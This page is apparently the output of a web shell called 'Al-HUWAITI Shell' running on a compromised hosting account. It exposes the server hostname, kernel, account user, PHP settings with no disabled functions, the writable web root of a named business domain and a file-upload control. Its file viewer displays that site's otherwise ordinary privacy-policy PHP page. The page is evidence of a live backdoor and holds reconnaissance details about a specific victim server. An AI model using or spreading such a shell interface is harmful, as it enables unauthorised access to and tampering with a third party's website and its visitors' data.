Al-HUWAITI Shell
Al-huwaiti


Server : LiteSpeed
System : Linux us-phx-web1202.main-hosting.eu 4.18.0-553.84.1.lve.el8.x86_64 #1 SMP Tue Nov 25 18:33:03 UTC 2025 x86_64
User : u615232177 ( 615232177)
PHP Version : 8.1.33
Disable Function : NONE
Directory :  /home/u615232177/domains/florencewaltersconsulting.com/public_html/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /home/u615232177/domains/florencewaltersconsulting.com/public_html/privacy.php
<?php session_start();
$page_name = basename($_SERVER['PHP_SELF']);
$page_title = "Privacy Policy";
$page_header = "privacy_header.jpg";
include("header.php"); ?>
<title><?php echo $company_name; ?> - <?php echo $page_title; ?></title>
<?php include("page_header.php"); ?>

<!-- FAQ -->
<div class="faq mt-100">
    <div class="container my-5">
        <div class="row">
            <div class="col-lg-10 mx-auto">

                <h1 class="mb-4">Privacy Policy</h1>
                <p class="text-muted">Last updated: <strong>February 2026</strong></p>

                <p>
                    <strong><?= $company_name ?></strong> (“we,” “us,” or “our”) is committed to protecting your privacy.
                    This Privacy Policy explains how we collect, use, disclose, and safeguard your information when you visit
                    our website, use our services, or otherwise interact with us.
                </p>

                <p>
                    By using our website or services, you agree to the terms of this Privacy Policy.
                </p>

                <hr class="my-4">

                <h4>1. Information We Collect</h4>
                <p>We may collect information about you in a variety of ways, including:</p>

                <h6 class="mt-3">a) Personal Information</h6>
                <ul>
                    <li>Name</li>
                    <li>Email address</li>
                    <li>Phone number</li>
                    <li>Organization or company name</li>
                    <li>Job title</li>
                    <li>Any other information you voluntarily provide to us</li>
                </ul>

                <h6 class="mt-3">b) Automatically Collected Information</h6>
                <ul>
                    <li>IP address</li>
                    <li>Browser type and version</li>
                    <li>Device information</li>
                    <li>Pages visited and time spent on the site</li>
                    <li>Referring URLs</li>
                </ul>

                <h6 class="mt-3">c) Cookies and Similar Technologies</h6>
                <p>
                    We may use cookies and similar technologies to improve website functionality, analyze usage, and enhance your
                    experience. You can control or disable cookies through your browser settings.
                </p>

                <hr class="my-4">

                <h4>2. How We Use Your Information</h4>
                <ul>
                    <li>To respond to inquiries and provide requested services</li>
                    <li>To communicate with you about our services, updates, or events</li>
                    <li>To improve our website, services, and user experience</li>
                    <li>To maintain security and prevent fraud or abuse</li>
                    <li>To comply with legal and regulatory obligations</li>
                </ul>

                <hr class="my-4">

                <h4>3. Legal Basis for Processing (Where Applicable)</h4>
                <p>
                    We process personal data based on one or more of the following: your consent, the need to perform a contract
                    or respond to your request, our legitimate business interests, or compliance with legal obligations.
                </p>

                <hr class="my-4">

                <h4>4. How We Share Your Information</h4>
                <p>We do <strong>not</strong> sell your personal information. We may share your information only:</p>
                <ul>
                    <li>With trusted service providers who assist us in operating our website or delivering services, under confidentiality obligations</li>
                    <li>When required by law, regulation, or legal process</li>
                    <li>To protect our rights, property, or safety, or that of our clients or others</li>
                    <li>In connection with a business transfer, merger, or restructuring, with appropriate safeguards</li>
                </ul>

                <hr class="my-4">

                <h4>5. Data Retention</h4>
                <p>
                    We retain personal information only for as long as necessary to fulfill the purposes described in this Privacy
                    Policy, unless a longer retention period is required or permitted by law.
                </p>

                <hr class="my-4">

                <h4>6. Data Security</h4>
                <p>
                    We implement reasonable technical and organizational measures to protect your information against unauthorized
                    access, loss, misuse, or alteration. However, no method of transmission over the internet or electronic storage
                    is completely secure, and we cannot guarantee absolute security.
                </p>

                <hr class="my-4">

                <h4>7. Your Rights</h4>
                <p>
                    Depending on your location and applicable laws, you may have the right to request access, correction, or deletion
                    of your personal data, object to or restrict certain processing, or withdraw consent where applicable.
                </p>

                <hr class="my-4">

                <h4>8. International Data Transfers</h4>
                <p>
                    If we transfer your information across borders, we will take reasonable steps to ensure that your data is
                    protected in accordance with applicable data protection laws.
                </p>

                <hr class="my-4">

                <h4>9. Children’s Privacy</h4>
                <p>
                    Our website and services are not intended for children under the age of 13 (or the applicable age in your
                    jurisdiction). We do not knowingly collect personal information from children.
                </p>

                <hr class="my-4">

                <h4>10. Third-Party Links</h4>
                <p>
                    Our website may contain links to third-party websites. We are not responsible for the privacy practices or
                    content of those websites. We encourage you to review their privacy policies.
                </p>

                <hr class="my-4">

                <h4>11. Changes to This Privacy Policy</h4>
                <p>
                    We may update this Privacy Policy from time to time. The updated version will be indicated by an updated
                    “Last updated” date.
                </p>

                <hr class="my-4">

                <h4>12. Contact Us</h4>
                <p>
                    If you have any questions about this Privacy Policy or our data practices, please contact us at:
                </p>
                <p class="mb-0">
                    <strong><?= $company_name ?></strong><br>
                    Email: <a href=""><?= $company_email ?></a><br>
                </p>

            </div>
        </div>
    </div>

</div>
</main>
<br>
<?php include("footer.php"); ?>

Al-HUWAITI Shell